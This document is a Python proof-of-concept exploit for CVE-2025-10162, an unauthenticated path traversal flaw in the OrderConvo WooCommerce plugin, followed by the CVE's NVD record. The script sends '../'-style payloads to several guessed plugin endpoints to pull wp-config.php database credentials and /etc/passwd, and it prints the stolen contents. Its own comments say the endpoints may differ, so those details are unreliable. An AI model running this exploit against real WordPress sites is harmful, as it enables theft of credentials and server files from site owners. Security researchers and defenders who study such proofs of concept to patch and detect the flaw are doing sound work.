CVE-2025-10162

# CVE-2025-10162 - OrderConvo WordPress Plugin Path Traversal PoC # Vulnerability: Unauthenticated Arbitrary File Download via Path Traversal # Affected: Admin and Customer Messages After Order for WooCommerce (OrderConvo) < v14 import requests TARGET_URL = "http://target-wordpress-site.com" def exploit_path_traversal(target_url, target_file): """ Exploit path traversal to read arbitrary files from the WordPress server. The OrderConvo plugin fails to sanitize the file path parameter, allowing unauthenticated attackers to traverse directories. """ # Construct path traversal payload traversal_payload = "../../../" + target_file # Typical endpoint for file download in OrderConvo plugin # The exact endpoint may vary; commonly a download action is used endpoints = [ f"/wp-admin/admin-ajax.php?action=orderconvo_download&file={traversal_payload}", f"/wp-content/plugins/orderconvo/download.php?file={traversal_payload}", f"/?orderconvo_download=1&file={traversal_payload}", ] for endpoint in endpoints: url = target_url + endpoint print(f"[*] Trying: {url}") try: response = requests.get(url, timeout=10, allow_redirects=False) if response.status_code == 200 and len(response.content) > 0: print(f"[+] Success! File content retrieved (HTTP {response.status_code}):") print("-" * 60) print(response.text[:2000]) print("-" * 60) return response.text except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("[-] Exploitation failed. Target may not be vulnerable or endpoint differs.") return None if __name__ == "__main__": # Target sensitive files commonly sought by attackers sensitive_files = [ "wp-config.php", # WordPress config (DB credentials) "../../../wp-config.php", "..\\..\\..\\wp-config.php", "/etc/passwd", # Linux system file "../../../../etc/passwd", ] for f in sensitive_files: result = exploit_path_traversal(TARGET_URL, f) if result: break

{"cve": {"id": "CVE-2025-10162", "sourceIdentifier": "[email protected]", "published": "2025-10-07T06:15:32.677", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Admin and Customer Messages After Order for WooCommerce: OrderConvo WordPress plugin before 14 does not validate the path of files to be downloaded, which could allow unauthenticated attacker to read/download arbitrary files via a path traversal attack"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "references": [{"url": "https://wpscan.com/vulnerability/f878615d-955d-4365-87e0-6c928f548986/", "source": "[email protected]"}, {"url": "https://wpscan.com/vulnerability/f878615d-955d-4365-87e0-6c928f548986/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}